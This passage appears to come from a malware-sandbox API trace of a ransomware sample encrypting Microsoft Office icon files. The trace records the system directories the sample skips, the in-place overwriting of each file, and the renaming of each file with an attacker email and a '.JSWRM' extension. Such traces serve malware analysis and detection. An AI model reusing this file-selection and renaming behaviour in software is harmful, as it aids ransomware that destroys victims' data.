lpNumberOfBytesRead=0x345e534*=0xbb0, lpOverlapped=0x0) returned 1 [0130.133] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.133] WriteFile (in: hFile=0x314, lpBuffer=0x278330*, nNumberOfBytesToWrite=0xbb0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesWritten=0x345e530*=0xbb0, lpOverlapped=0x0) returned 1 [0130.133] CloseHandle (hObject=0x314) returned 1 [0130.133] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\SCDCNCLS.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\scdcncls.ico"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\SCDCNCLS.ICO.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\scdcncls.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.134] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb461f79, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcb461f79, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb4881c8, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x436, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="SCDREQL.ICO", cAlternateFileName="")) returned 1 [0130.134] lstrcmpiW (lpString1="SCDREQL.ICO", lpString2=".") returned 1 [0130.134] lstrcmpiW (lpString1="SCDREQL.ICO", lpString2="..") returned 1 [0130.134] lstrcmpiW (lpString1="SCDREQL.ICO", lpString2="...") returned 1 [0130.134] lstrcmpiW (lpString1="SCDREQL.ICO", lpString2="windows") returned -1 [0130.134] lstrcmpiW (lpString1="SCDREQL.ICO", lpString2="recovery") returned 1 [0130.134] lstrcmpiW (lpString1="SCDREQL.ICO", lpString2="perflogs") returned 1 [0130.134] lstrcmpiW (lpString1="SCDREQL.ICO", lpString2="documents and settings") returned 1 [0130.134] lstrcmpiW (lpString1="SCDREQL.ICO", lpString2="$RECYCLE.BIN") returned 1 [0130.134] lstrcmpiW (lpString1="SCDREQL.ICO", lpString2="system volume information") returned -1 [0130.134] lstrcmpiW (lpString1="SCDREQL.ICO", lpString2="msocache") returned 1 [0130.134] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCDREQL.ICO", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0130.134] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCDREQL.ICO", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCDREQL.ICO", lpUsedDefaultChar=0x0) returned 11 [0130.134] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCDREQL.ICO", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0130.134] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCDREQL.ICO", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCDREQL.ICO", lpUsedDefaultChar=0x0) returned 11 [0130.134] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.134] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.134] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\SCDREQL.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\scdreql.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0130.135] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=1078) returned 1 [0130.135] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.135] ReadFile (in: hFile=0x314, lpBuffer=0x230a00, nNumberOfBytesToRead=0x430, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesRead=0x345e534*=0x430, lpOverlapped=0x0) returned 1 [0130.137] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.137] WriteFile (in: hFile=0x314, lpBuffer=0x230a00*, nNumberOfBytesToWrite=0x430, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesWritten=0x345e530*=0x430, lpOverlapped=0x0) returned 1 [0130.137] CloseHandle (hObject=0x314) returned 1 [0130.137] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\SCDREQL.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\scdreql.ico"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\SCDREQL.ICO.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\scdreql.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.138] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb461f79, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcb461f79, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb461f79, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xbb6, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="SCDREQS.ICO", cAlternateFileName="")) returned 1 [0130.138] lstrcmpiW (lpString1="SCDREQS.ICO", lpString2=".") returned 1 [0130.138] lstrcmpiW (lpString1="SCDREQS.ICO", lpString2="..") returned 1 [0130.138] lstrcmpiW (lpString1="SCDREQS.ICO", lpString2="...") returned 1 [0130.138] lstrcmpiW (lpString1="SCDREQS.ICO", lpString2="windows") returned -1 [0130.138] lstrcmpiW (lpString1="SCDREQS.ICO", lpString2="recovery") returned 1 [0130.138] lstrcmpiW (lpString1="SCDREQS.ICO", lpString2="perflogs") returned 1 [0130.138] lstrcmpiW (lpString1="SCDREQS.ICO", lpString2="documents and settings") returned 1 [0130.138] lstrcmpiW (lpString1="SCDREQS.ICO", lpString2="$RECYCLE.BIN") returned 1 [0130.138] lstrcmpiW (lpString1="SCDREQS.ICO", lpString2="system volume information") returned -1 [0130.138] lstrcmpiW (lpString1="SCDREQS.ICO", lpString2="msocache") returned 1 [0130.138] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCDREQS.ICO", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0130.138] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCDREQS.ICO", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCDREQS.ICO", lpUsedDefaultChar=0x0) returned 11 [0130.138] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCDREQS.ICO", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0130.139] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCDREQS.ICO", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCDREQS.ICO", lpUsedDefaultChar=0x0) returned 11 [0130.139] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.139] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.139] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\SCDREQS.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\scdreqs.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0130.140] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=2998) returned 1 [0130.140] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.140] ReadFile (in: hFile=0x314, lpBuffer=0x278330, nNumberOfBytesToRead=0xbb0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesRead=0x345e534*=0xbb0, lpOverlapped=0x0) returned 1 [0130.141] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.141] WriteFile (in: hFile=0x314, lpBuffer=0x278330*, nNumberOfBytesToWrite=0xbb0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesWritten=0x345e530*=0xbb0, lpOverlapped=0x0) returned 1 [0130.142] CloseHandle (hObject=0x314) returned 1 [0130.142] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\SCDREQS.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\scdreqs.ico"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\SCDREQS.ICO.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\scdreqs.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.143] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb461f79, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcb461f79, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb4881c8, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x436, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="SCDRESNL.ICO", cAlternateFileName="")) returned 1 [0130.143] lstrcmpiW (lpString1="SCDRESNL.ICO", lpString2=".") returned 1 [0130.143] lstrcmpiW (lpString1="SCDRESNL.ICO", lpString2="..") returned 1 [0130.143] lstrcmpiW (lpString1="SCDRESNL.ICO", lpString2="...") returned 1 [0130.143] lstrcmpiW (lpString1="SCDRESNL.ICO", lpString2="windows") returned -1 [0130.143] lstrcmpiW (lpString1="SCDRESNL.ICO", lpString2="recovery") returned 1 [0130.143] lstrcmpiW (lpString1="SCDRESNL.ICO", lpString2="perflogs") returned 1 [0130.143] lstrcmpiW (lpString1="SCDRESNL.ICO", lpString2="documents and settings") returned 1 [0130.143] lstrcmpiW (lpString1="SCDRESNL.ICO", lpString2="$RECYCLE.BIN") returned 1 [0130.143] lstrcmpiW (lpString1="SCDRESNL.ICO", lpString2="system volume information") returned -1 [0130.143] lstrcmpiW (lpString1="SCDRESNL.ICO", lpString2="msocache") returned 1 [0130.143] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCDRESNL.ICO", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0130.143] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCDRESNL.ICO", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCDRESNL.ICO", lpUsedDefaultChar=0x0) returned 12 [0130.143] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCDRESNL.ICO", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0130.143] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCDRESNL.ICO", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCDRESNL.ICO", lpUsedDefaultChar=0x0) returned 12 [0130.143] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.143] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.143] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\SCDRESNL.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\scdresnl.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0130.144] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=1078) returned 1 [0130.144] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.144] ReadFile (in: hFile=0x314, lpBuffer=0x230a00, nNumberOfBytesToRead=0x430, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesRead=0x345e534*=0x430, lpOverlapped=0x0) returned 1 [0130.146] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.146] WriteFile (in: hFile=0x314, lpBuffer=0x230a00*, nNumberOfBytesToWrite=0x430, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesWritten=0x345e530*=0x430, lpOverlapped=0x0) returned 1 [0130.146] CloseHandle (hObject=0x314) returned 1 [0130.146] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\SCDRESNL.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\scdresnl.ico"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\SCDRESNL.ICO.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\scdresnl.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.147] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb461f79, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcb461f79, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb4881c8, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xbb6, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="SCDRESNS.ICO", cAlternateFileName="")) returned 1 [0130.147] lstrcmpiW (lpString1="SCDRESNS.ICO", lpString2=".") returned 1 [0130.147] lstrcmpiW (lpString1="SCDRESNS.ICO", lpString2="..") returned 1 [0130.147] lstrcmpiW (lpString1="SCDRESNS.ICO", lpString2="...") returned 1 [0130.147] lstrcmpiW (lpString1="SCDRESNS.ICO", lpString2="windows") returned -1 [0130.147] lstrcmpiW (lpString1="SCDRESNS.ICO", lpString2="recovery") returned 1 [0130.147] lstrcmpiW (lpString1="SCDRESNS.ICO", lpString2="perflogs") returned 1 [0130.147] lstrcmpiW (lpString1="SCDRESNS.ICO", lpString2="documents and settings") returned 1 [0130.147] lstrcmpiW (lpString1="SCDRESNS.ICO", lpString2="$RECYCLE.BIN") returned 1 [0130.147] lstrcmpiW (lpString1="SCDRESNS.ICO", lpString2="system volume information") returned -1 [0130.147] lstrcmpiW (lpString1="SCDRESNS.ICO", lpString2="msocache") returned 1 [0130.147] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCDRESNS.ICO", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0130.147] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCDRESNS.ICO", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCDRESNS.ICO", lpUsedDefaultChar=0x0) returned 12 [0130.148] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCDRESNS.ICO", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0130.148] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCDRESNS.ICO", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCDRESNS.ICO", lpUsedDefaultChar=0x0) returned 12 [0130.148] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.148] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.148] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\SCDRESNS.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\scdresns.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0130.148] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=2998) returned 1 [0130.148] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.148] ReadFile (in: hFile=0x314, lpBuffer=0x278330, nNumberOfBytesToRead=0xbb0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesRead=0x345e534*=0xbb0, lpOverlapped=0x0) returned 1 [0130.150] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.150] WriteFile (in: hFile=0x314, lpBuffer=0x278330*, nNumberOfBytesToWrite=0xbb0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesWritten=0x345e530*=0xbb0, lpOverlapped=0x0) returned 1 [0130.150] CloseHandle (hObject=0x314) returned 1 [0130.150] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\SCDRESNS.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\scdresns.ico"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\SCDRESNS.ICO.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\scdresns.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.151] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb461f79, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcb461f79, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb461f79, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x436, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="SCDRESPL.ICO", cAlternateFileName="")) returned 1 [0130.152] lstrcmpiW (lpString1="SCDRESPL.ICO", lpString2=".") returned 1 [0130.152] lstrcmpiW (lpString1="SCDRESPL.ICO", lpString2="..") returned 1 [0130.152] lstrcmpiW (lpString1="SCDRESPL.ICO", lpString2="...") returned 1 [0130.152] lstrcmpiW (lpString1="SCDRESPL.ICO", lpString2="windows") returned -1 [0130.152] lstrcmpiW (lpString1="SCDRESPL.ICO", lpString2="recovery") returned 1 [0130.152] lstrcmpiW (lpString1="SCDRESPL.ICO", lpString2="perflogs") returned 1 [0130.152] lstrcmpiW (lpString1="SCDRESPL.ICO", lpString2="documents and settings") returned 1 [0130.152] lstrcmpiW (lpString1="SCDRESPL.ICO", lpString2="$RECYCLE.BIN") returned 1 [0130.152] lstrcmpiW (lpString1="SCDRESPL.ICO", lpString2="system volume information") returned -1 [0130.152] lstrcmpiW (lpString1="SCDRESPL.ICO", lpString2="msocache") returned 1 [0130.152] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCDRESPL.ICO", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0130.152] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCDRESPL.ICO", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCDRESPL.ICO", lpUsedDefaultChar=0x0) returned 12 [0130.152] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCDRESPL.ICO", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0130.152] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCDRESPL.ICO", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCDRESPL.ICO", lpUsedDefaultChar=0x0) returned 12 [0130.152] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.152] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.152] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\SCDRESPL.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\scdrespl.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0130.153] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=1078) returned 1 [0130.153] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.153] ReadFile (in: hFile=0x314, lpBuffer=0x230a00, nNumberOfBytesToRead=0x430, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesRead=0x345e534*=0x430, lpOverlapped=0x0) returned 1 [0130.154] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.154] WriteFile (in: hFile=0x314, lpBuffer=0x230a00*, nNumberOfBytesToWrite=0x430, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesWritten=0x345e530*=0x430, lpOverlapped=0x0) returned 1 [0130.155] CloseHandle (hObject=0x314) returned 1 [0130.155] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\SCDRESPL.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\scdrespl.ico"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\SCDRESPL.ICO.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\scdrespl.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.156] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb461f79, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcb461f79, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb461f79, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xbb6, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="SCDRESPS.ICO", cAlternateFileName="")) returned 1 [0130.156] lstrcmpiW (lpString1="SCDRESPS.ICO", lpString2=".") 